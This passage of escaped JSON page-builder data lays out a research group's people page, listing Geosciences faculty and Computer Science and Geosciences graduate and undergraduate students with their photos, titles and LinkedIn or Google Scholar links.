me\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       